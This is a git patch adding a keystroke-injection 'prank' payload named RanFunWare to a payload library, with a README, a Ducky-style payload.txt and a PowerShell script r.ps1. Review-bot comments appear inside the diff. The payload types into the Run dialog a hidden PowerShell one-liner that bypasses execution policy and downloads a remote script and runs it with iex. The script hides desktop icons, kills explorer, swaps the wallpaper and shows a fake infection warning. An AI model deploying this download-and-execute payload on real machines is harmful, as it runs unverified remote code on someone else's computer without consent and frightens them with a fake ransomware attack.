From a51949685ea110bd5ce35faaac9fed835f179723 Mon Sep 17 00:00:00 2001
From: atomic <75549184+atomiczsec@users.noreply.github.com>
Date: Mon, 10 Oct 2022 15:00:03 -0400
Subject: [PATCH] Add files via upload
---
payloads/library/prank/RanFunWare/README.md | 108 ++++++++++++++++++
payloads/library/prank/RanFunWare/payload.txt | 16 +++
payloads/library/prank/RanFunWare/r.ps1 | 70 ++++++++++++
3 files changed, 194 insertions(+)
create mode 100644 payloads/library/prank/RanFunWare/README.md
create mode 100644 payloads/library/prank/RanFunWare/payload.txt
create mode 100644 payloads/library/prank/RanFunWare/r.ps1
diff --git a/payloads/library/prank/RanFunWare/README.md b/payloads/library/prank/RanFunWare/README.md
new file mode 100644
index 0000000..32c5352
--- /dev/null
+++ b/payloads/library/prank/RanFunWare/README.md
@@ -0,0 +1,108 @@
+
+
+

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# RanFunWare + +A payload to prank your friends into thinking their computer got hit with ransomware. + +## Description + +This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/RanFunWare/payload.txt b/payloads/library/prank/RanFunWare/payload.txt
new file mode 100644
index 0000000..8749016
--- /dev/null
+++ b/payloads/library/prank/RanFunWare/payload.txt
@@ -0,0 +1,16 @@
+REM Title: RanFunWare
+
+REM Author: atomiczsec
+
+REM Description: This payload will prank your target into thinking their machine got hit with ransomware.
+
+REM Target: Windows 10
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/payloads/library/prank/RanFunWare/r.ps1 b/payloads/library/prank/RanFunWare/r.ps1
new file mode 100644
index 0000000..b557338
--- /dev/null
+++ b/payloads/library/prank/RanFunWare/r.ps1
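Review bot: In payload.txt the `STRING` line pulls a script from a mutable shared link and hands it to `iex` under `-ep Bypass`, so whatever sits behind that link at run time executes as the logged-in user and nothing pins it to the `r.ps1` committed here. A header line such as `REM Note: runs unverified remote content; compare the hosted script's SHA-256 with the committed r.ps1 before use` would state that dependency. The final REM line also carries stray text, `mode con:cols=14 lines=1`, fused onto its end, and the file has no trailing newline. For defenders, the hidden-window, `-NoP`, `-ep Bypass`, `iwr`-then-`iex` command line typed into the Run dialog is visible to process command-line auditing and PowerShell script-block logging.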
@@ -0,0 +1,70 @@
+#Hides Desktop Icons
+$Path="HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
+Set-ItemProperty -Path $Path -Name "HideIcons" -Value 1
+Get-Process "explorer"| Stop-Process
+
+#Changes Background
+#URL For the Image of your choice (Wanna Cry Ransomware Background)
+$url = "https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg"
+
+
+Invoke-WebRequest $url -OutFile C:\temp\test.jpg
+
+
+$setwallpapersrc = @"
+using System.Runtime.InteropServices;
+
+public class Wallpaper
+{
+ public const int SetDesktopWallpaper = 20;
+ public const int UpdateIniFile = 0x01;
+ public const int SendWinIniChange = 0x02;
+ [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
+ private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
+ public static void SetWallpaper(string path)
+ {
+ SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);
+ }
+}
+"@
+Add-Type -TypeDefinition $setwallpapersrc
+
+[Wallpaper]::SetWallpaper("C:\temp\test.jpg")
+
+
+#Pop Up Message
+
+function MsgBox {
+
+[CmdletBinding()]
+param (
+[Parameter (Mandatory = $True)]
+[Alias("m")]
+[string]$message,
+
+[Parameter (Mandatory = $False)]
+[Alias("t")]
+[string]$title,
+
+[Parameter (Mandatory = $False)]
+[Alias("b")]
+[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]
+[string]$button,
+
+[Parameter (Mandatory = $False)]
+[Alias("i")]
+[ValidateSet('None','Hand','Question','Warning','Asterisk')]
+[string]$image
+)
+
+Add-Type -AssemblyName PresentationCore,PresentationFramework
+
+if (!$title) {$title = " "}
+if (!$button) {$button = "OK"}
+if (!$image) {$image = "None"}
+
+[System.Windows.MessageBox]::Show($message,$title,$button,$image)
+
+}
+
+MsgBox -m 'Your Computer Has Been Infected' -t "Warning" -b OKCancel -i Warning
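Review bot: Nothing in r.ps1 records or restores the state it changes: `HideIcons` is set to 1 under HKCU `Explorer\Advanced` and the wallpaper is written with `UpdateIniFile | SendWinIniChange`, so both settings outlast the message box. Saving the prior values before changing them and documenting a revert would bound the effect, e.g. a header comment `# Undo: set HideIcons back to 0, restart explorer, restore the saved wallpaper path`. The `Invoke-WebRequest $url -OutFile C:\temp\test.jpg` line also assumes `C:\temp` exists and the download succeeded; `SetWallpaper` is called regardless and the return value of `SystemParametersInfo` is discarded, so a failure is silent. The image is hot-linked from a third-party host, so what gets displayed is controlled by that host rather than by this repository.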